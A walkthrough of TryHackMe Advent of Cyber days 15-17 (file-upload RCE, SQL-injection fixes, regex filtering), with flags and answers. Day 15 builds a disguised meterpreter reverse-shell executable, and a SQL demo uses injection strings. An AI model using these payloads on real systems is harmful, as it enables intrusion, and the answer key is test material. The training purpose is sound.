https://tryhackme.com/room/adventofcyber4

Task 20 [Day 15] Secure Coding Santa is looking for a Sidekick

Question 1:
What is the name given to file uploads that allow threat actors to upload any files that they want?

Answer 1:
unrestricted

Question 2:
What is the title of the web application developed by Santa’s freelancer?

Answer 2:
SantaSideKick2

Question 3:
What is the value of the flag stored in the HR Elf’s Documents directory?

We build our payload (named like a CV, since that is what the application's upload form expects), start the listener, upload the file through SantaSideKick2 and then wait for the "callback":

root@ip-10-10-87-226:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.87.226 LPORT=1234 -f exe -o cv-username.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: cv-username.exe
root@ip-10-10-87-226:~# sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.10.87.226; set LPORT 1234; exploit"
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => 10.10.87.226
LPORT => 1234
[*] Started reverse TCP handler on 10.10.87.226:1234 
[*] Sending stage (201283 bytes) to 10.10.231.60
[*] Meterpreter session 1 opened (10.10.87.226:1234 -> 10.10.231.60:49866) at 2022-12-16 17:38:07 +0000

meterpreter > 

Now we only have to look around the machine a little for the flag. Here is the shortened version:

meterpreter > cd ..
meterpreter > cd ..
meterpreter > cd Users
meterpreter > cd HR_Elf
meterpreter > cd Documents
meterpreter > cat flag.txt
THM{Naughty.File.Uploads.Can.Get.You.RCE}

Answer 3:
THM{Naughty.File.Uploads.Can.Get.You.RCE}

Question 4:
What defence technique can be implemented to ensure that specific file types can be uploaded?

Answer 4:
File Extension Validation

Question 5:
What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Answer 5:
File Renaming

Question 6:
What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?

Answer 6:
Malware Scanning
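The three answers above name the controls; the following is an added example (Python, written for this page and not the SantaSideKick2 application's own code) of a CV upload handler that applies all three, so that the cv-username.exe from the exploit above is refused. The allow-list of PDF and DOCX, the magic-byte table, the EICAR test string together with an MZ header standing in for a real scanner engine, and the sample files in the usage section are all assumptions of the example.

```python
"""Hardened CV upload: extension allow-list, content check, scan, random rename.

Added example (Python), not the SantaSideKick2 application's own code.
Assumptions: a CV may only be PDF or DOCX; the EICAR test string and an
MZ (PE executable) header stand in for a real malware engine such as ClamAV.
"""
import os
import secrets
import tempfile
from typing import Tuple

ALLOWED_EXTENSIONS = {".pdf", ".docx"}
# First bytes the content must carry for the claimed type.
MAGIC = {".pdf": b"%PDF-", ".docx": b"PK\x03\x04"}
# Standard harmless AV test signature; a real deployment calls a scanner engine.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"


class UploadRejected(Exception):
    """Raised with a short reason when a file fails one of the checks."""


def validate_extension(filename: str) -> str:
    """File extension validation: only the last suffix counts, so cv.pdf.exe is an .exe."""
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} not allowed")
    return ext


def validate_content(ext: str, content: bytes) -> None:
    """The name is attacker-controlled; the bytes must agree with the claimed type."""
    if not content.startswith(MAGIC[ext]):
        raise UploadRejected("content does not match declared type")


def scan_for_malware(content: bytes) -> None:
    """Malware scanning stand-in: flags the EICAR string or a PE (MZ) header."""
    if EICAR in content or content.startswith(b"MZ"):
        raise UploadRejected("malware scanner rejected file")


def store_upload(filename: str, content: bytes, upload_dir: str) -> str:
    """Run all checks, then save under a random name; return that name."""
    ext = validate_extension(filename)
    validate_content(ext, content)
    scan_for_malware(content)
    # File renaming: the uploader cannot predict the stored name, so they
    # cannot fetch /uploads/cv-username.exe back, and no "../" from the
    # original name ever reaches the filesystem.
    stored_name = secrets.token_hex(16) + ext
    with open(os.path.join(upload_dir, stored_name), "wb") as fh:
        fh.write(content)
    return stored_name


def try_upload(filename: str, content: bytes, upload_dir: str) -> Tuple[bool, str]:
    """Convenience wrapper: (True, stored name) or (False, rejection reason)."""
    try:
        return True, store_upload(filename, content, upload_dir)
    except UploadRejected as exc:
        return False, str(exc)


def make_upload_dir() -> str:
    """Fresh scratch directory so the example runs anywhere."""
    return tempfile.mkdtemp(prefix="uploads-")


if __name__ == "__main__":
    d = make_upload_dir()
    # Constructed sample files: the exploit above, a double extension,
    # an executable renamed to .pdf, an EICAR-carrying PDF and a genuine PDF.
    for name, data in [
        ("cv-username.exe", b"MZ\x90\x00" + b"\x00" * 60),
        ("cv.pdf.exe", b"%PDF-1.4 fake"),
        ("cv.pdf", b"MZ renamed executable"),
        ("cv.pdf", b"%PDF-1.4 " + EICAR),
        ("cv.pdf", b"%PDF-1.4 genuine resume"),
    ]:
        print(name, try_upload(name, data, d))
```

Extension validation on its own is the weakest of the three, because the name is chosen by the uploader; the content check and the scan are what actually stop a renamed executable, and the random stored name is what stops the uploader from requesting their file back by its original name.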

Task 21 [Day 16] Secure Coding SQLi’s the king, the carolers sing

Question 1:
What is the value of Flag1?

In line 17 of elf.php we need to change the code to the following:

$query="select * from toys where creator_id=".floatval($_GET['id']);

Now we have the elves check the code and receive our flag. Since creator_id is an integer, intval() would be the more natural cast; floatval() is accepted as well, because either way only a number is left to be concatenated into the query.

Answer 1:
THM{McCode, Elf McCode}

Question 2:
What is the value of Flag2?

We replace lines 4 and 5 of search-toys.php with the following code, which turns the string-concatenated query into a prepared statement:

$q = "%".$_GET['q']."%";   // the LIKE wildcards belong in the value, not in the SQL text
$query="select * from toys where name like ? or description like ?";
$stmt = mysqli_prepare($db, $query);
mysqli_stmt_bind_param($stmt, 'ss', $q, $q);   // both placeholders are bound as strings
mysqli_stmt_execute($stmt);
$toys_rs=mysqli_stmt_get_result($stmt);

Answer 2:
THM{KodeNRoll}

Question 3:
What is the value of Flag3?

In line 37 of toy.php the id parameter has to be cast to an integer (digits only), the same fix as for Flag1:

$query="select * from kids where assigned_toy_id=".intval($_GET['id']);

Answer 3:
THM{Are we secure yet?}

Question 4:
What is the value of Flag4?

As in question 2, we need a prepared statement instead of concatenating the input. To do so, we change the first block of login.php to the following. (The query still compares the submitted password directly with the stored column, so passwords are evidently stored unhashed; that is a separate problem the task does not ask us to fix.)

if(isset($_POST['username']) && isset($_POST['password'])){
	$username=$_POST['username'];
	$password=$_POST['password'];
	// placeholders instead of pasting the POST values into the query text
	$query="select * from users where username=? and password=?";
	$stmt = mysqli_prepare($db, $query);
	mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
	mysqli_stmt_execute($stmt);
	$users_rs=mysqli_stmt_get_result($stmt);
	// the remainder of the original block stays as it was
}

Answer 4:
THM{SQLi_who???}
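To see why the four fixes above work, here is an added example (Python with sqlite3, not the room's PHP code) that runs the vulnerable concatenation next to the integer cast and the bound-parameter versions against the same payloads. The schema, the rows and the to_int() helper that mimics PHP's intval() are constructed for the example.

```python
"""The injection pattern from the task and its two fixes, side by side.

Added example in Python with sqlite3, not the room's PHP code. The schema
and rows are constructed; to_int() mimics PHP's intval() on the GET value.
"""
import re
import sqlite3


def build_db() -> sqlite3.Connection:
    """In-memory stand-in for the toys/users tables of the room."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table toys(id integer, creator_id integer, name text, description text);
        insert into toys values (1, 1, 'train', 'wooden train'),
                                (2, 1, 'doll',  'rag doll'),
                                (3, 2, 'kite',  'red kite');
        create table users(username text, password text);
        insert into users values ('santa', 'hohoho'), ('elf', 'cookies');
    """)
    return db


def to_int(value: str) -> int:
    """intval() semantics: leading (signed) digits, anything else gives 0."""
    m = re.match(r"\s*[+-]?\d+", value)
    return int(m.group()) if m else 0


def toys_vulnerable(db, creator_id: str) -> list:
    """elf.php before the fix: the GET value is pasted into the SQL text."""
    sql = "select name from toys where creator_id=" + creator_id
    return [row[0] for row in db.execute(sql)]


def toys_cast(db, creator_id: str) -> list:
    """Flag1/Flag3 fix: cast first, so only a number reaches the query."""
    sql = "select name from toys where creator_id=" + str(to_int(creator_id))
    return [row[0] for row in db.execute(sql)]


def search_parameterised(db, q: str) -> list:
    """Flag2 fix: the LIKE pattern travels as a bound parameter, not as SQL."""
    like = "%" + q + "%"
    sql = "select name from toys where name like ? or description like ?"
    return [row[0] for row in db.execute(sql, (like, like))]


def login_vulnerable(db, username: str, password: str) -> bool:
    """login.php before the fix: a quote in the input ends the string literal."""
    sql = f"select * from users where username='{username}' and password='{password}'"
    return db.execute(sql).fetchone() is not None


def login_parameterised(db, username: str, password: str) -> bool:
    """Flag4 fix: placeholders, so a quote in the input is just a quote."""
    sql = "select * from users where username=? and password=?"
    return db.execute(sql, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = build_db()
    print(toys_vulnerable(db, "2 or 1=1"))             # every toy leaks
    print(toys_cast(db, "2 or 1=1"))                   # only creator 2's toy
    print(search_parameterised(db, "%' or 1=1 --"))    # nothing matches
    print(login_vulnerable(db, "santa' --", "wrong"))  # True: login bypassed
    print(login_parameterised(db, "santa' --", "wrong"))  # False
```

The cast is only a valid fix where the column really is numeric (creator_id, assigned_toy_id); for the free-text search and the login, where the value must stay a string, binding the value as a parameter is the fix, and it works because the database receives the SQL and the value separately and never re-parses the value as SQL.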

Task 22 [Day 17] Secure Coding Filtering for Order Amidst Chaos

Question 1:
Filtering for Usernames: How many usernames fit the syntax above?

The exact specification is in the "Exercise" section a little further up: "Filtering for Usernames: Alphanumeric, minimum of 6 characters, maximum of 12 characters, may consist of upper and lower case letters."

Enter your regex here: ^[a-zA-Z0-9]{6,12}$
9z8yMc9T
31337aq
39C3qxP
R6fUTY2nC8
9Qe5f4
User35
u3Y73h3
5Xze553j

Answer 1:
8

Question 2:
Filtering for Usernames: One username consists of a readable word concatenated with a number. What is it?

The answer can be found in the output of question 1.

Answer 2:
User35

Question 3:
Filtering for Emails: How many emails fit the syntax above?

Again we look under Exercise: "Filtering for Emails: Follows the form 'local-part@domain' (without quotation marks); local-part is a random string, and the domain is in the form of '<domain name>.tld'. All top-level domains (tld) are '.com'". The regex below is deliberately loose: the character class [@] is just a plain @, and the .+ on either side of it would also accept spaces or a second @. That is enough for this list, but not something to copy into a real validator.

Enter your regex here: ^.+[@].+\.com$
br33zy@gmail.com
lewisham44@amg.com
johnny.the.sinner@yahoo.com
badyeti@gmail.com
maxximax@fedfull.com
jklabada@tryhackme.com
johnny.the.sinner@yahoo.com
hunter4k@canary.com
hussain.volt@hotmail.com
marckymarc@tryhackme.com
batteryvoltas@alfa.com

Answer 3:
11

Question 4:
Filtering for Emails: How many unique domains are there?

The answer can be found in the output of question 3. Note that johnny.the.sinner@yahoo.com appears twice in the list, so the 11 matches correspond to ten distinct addresses and eight distinct domains.

Answer 4:
8

Question 5:
Filtering for Emails: What is the domain of the email with the local-part "lewisham44"?

The answer can be found in the output of question 3.

Answer 5:
amg.com

Question 6:
Filtering for Emails: What is the domain of the email with the local-part "maxximax"?

The answer can be found in the output of question 3.

Answer 6:
fedfull.com

Question 7:
Filtering for Emails: What is the local-part of the email with the domain name "hotmail.com"?

The answer can be found in the output of question 3.

Answer 7:
hussain.volt

Question 8:
Filtering for URLs: How many URLs fit the syntax provided?

Under Exercise we find the exact details: "Filtering for URLs: Starts with either http or https; some of the URLs have 'www', and a TLD should exist." (The backslash before the colon in the regex below is unnecessary, since a colon has no special meaning in a regex, but it is harmless.)

Enter your regex here: ^http(s)?\://(www\.)?.+\..+$
http://www.sample.net/blood?ghost=force
http://keebler.com/dicta-tempore-id-dolores-blanditiis-ut.html
http://koch.com/quae-perspiciatis-non-unde-quo
http://johns.net/nisi-quis-dolorum-et-rerum
https://www.sample.edu/#fire
http://www.sample.info/?mint=trouble&action=move
https://www.sample.org/?quiet=expansion&grip=eggnog
http://spencer.com/sapiente-tempore-omnis-a-est-aut-atque-pariatur
http://pfeffer.biz/nulla-non-facilis-incidunt-necessitatibus-velit-inventore
https://www.kertzmann.com/possimus-ullam-consequatur-itaque-sed-modi-aliquam
https://www.sample.com/?air=color&cave=judge#shake
http://schinner.com/quia-vitae-qui-explicabo-provident-minima-ratione.html
https://runolfsson.com/esse-ab-rerum-et-quis-aut.html
https://www.moen.com/explicabo-exercitationem-culpa-et-eum-temporibus
https://horse.sample.com/shape/company?mom=collar#donkey
http://batz.com/reprehenderit-voluptate-id-soluta-tenetur

Answer 8:
16

Question 9:
Filtering for URLs: How many of these URLs start with "https"?

The answer can be found in the output of question 8.

Answer 9:
7
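The counts for questions 1, 3, 4 and 8 can be reproduced offline. The following is an added example (Python, written for this page, not part of the room's filter tool) that runs the three patterns used above over the three lists printed above and also shows a stricter pattern for the email and URL cases. The lists are copied from the page; the strict patterns and the helper names are my own.

```python
"""Day 17 filters applied to the lists on this page.

Added example; the three lists are the ones printed above, the page's own
patterns are kept, and the stricter patterns and helper names are mine.
"""
import re
from typing import List, Optional

USERNAME_RE = re.compile(r"^[a-zA-Z0-9]{6,12}$")
EMAIL_RE_PAGE = re.compile(r"^.+[@].+\.com$")
# Tighter reading of "local-part@<domain name>.com": one @, no whitespace.
EMAIL_RE_STRICT = re.compile(r"^[A-Za-z0-9._+-]+@[A-Za-z0-9-]+\.com$")
URL_RE_PAGE = re.compile(r"^http(s)?\://(www\.)?.+\..+$")
# Tighter: a host with a TLD, then an optional path with no whitespace.
URL_RE_STRICT = re.compile(r"^https?://(www\.)?[A-Za-z0-9.-]+\.[A-Za-z]{2,}(/\S*)?$")

USERNAMES = ["9z8yMc9T", "31337aq", "39C3qxP", "R6fUTY2nC8",
             "9Qe5f4", "User35", "u3Y73h3", "5Xze553j"]
EMAILS = ["br33zy@gmail.com", "lewisham44@amg.com", "johnny.the.sinner@yahoo.com",
          "badyeti@gmail.com", "maxximax@fedfull.com", "jklabada@tryhackme.com",
          "johnny.the.sinner@yahoo.com", "hunter4k@canary.com",
          "hussain.volt@hotmail.com", "marckymarc@tryhackme.com",
          "batteryvoltas@alfa.com"]
URLS = ["http://www.sample.net/blood?ghost=force",
        "http://keebler.com/dicta-tempore-id-dolores-blanditiis-ut.html",
        "http://koch.com/quae-perspiciatis-non-unde-quo",
        "http://johns.net/nisi-quis-dolorum-et-rerum",
        "https://www.sample.edu/#fire",
        "http://www.sample.info/?mint=trouble&action=move",
        "https://www.sample.org/?quiet=expansion&grip=eggnog",
        "http://spencer.com/sapiente-tempore-omnis-a-est-aut-atque-pariatur",
        "http://pfeffer.biz/nulla-non-facilis-incidunt-necessitatibus-velit-inventore",
        "https://www.kertzmann.com/possimus-ullam-consequatur-itaque-sed-modi-aliquam",
        "https://www.sample.com/?air=color&cave=judge#shake",
        "http://schinner.com/quia-vitae-qui-explicabo-provident-minima-ratione.html",
        "https://runolfsson.com/esse-ab-rerum-et-quis-aut.html",
        "https://www.moen.com/explicabo-exercitationem-culpa-et-eum-temporibus",
        "https://horse.sample.com/shape/company?mom=collar#donkey",
        "http://batz.com/reprehenderit-voluptate-id-soluta-tenetur"]


def matching(pattern: re.Pattern, items: List[str]) -> List[str]:
    """Items the anchored pattern accepts, in the original order."""
    return [item for item in items if pattern.match(item)]


def unique_domains(emails: List[str]) -> List[str]:
    """Distinct part after the last @ (question 4)."""
    return sorted({e.rsplit("@", 1)[1] for e in emails})


def domain_of(local_part: str, emails: List[str]) -> Optional[str]:
    """Domain for a given local-part (questions 5 and 6), None if absent."""
    for e in emails:
        local, domain = e.rsplit("@", 1)
        if local == local_part:
            return domain
    return None


def local_parts_of(domain: str, emails: List[str]) -> List[str]:
    """Local-parts registered under a domain (question 7)."""
    return [e.rsplit("@", 1)[0] for e in emails if e.rsplit("@", 1)[1] == domain]


def https_count(urls: List[str]) -> int:
    """URLs whose scheme is https (question 9)."""
    return sum(1 for u in urls if u.startswith("https://"))


if __name__ == "__main__":
    print(len(matching(USERNAME_RE, USERNAMES)), "usernames")
    print(len(matching(EMAIL_RE_PAGE, EMAILS)), "emails,", len(unique_domains(EMAILS)), "domains")
    print(len(matching(URL_RE_PAGE, URLS)), "urls,", https_count(URLS), "https")
    # Where the page's loose email pattern and the strict one disagree:
    print(EMAIL_RE_PAGE.match("two words@evil .com") is not None,
          EMAIL_RE_STRICT.match("two words@evil .com") is not None)
```

On the lists from this page both the loose and the strict patterns give the same counts; the difference only shows up on malformed input such as an address containing spaces, which the page's pattern accepts and the strict one rejects. In a real input filter that difference is the whole point.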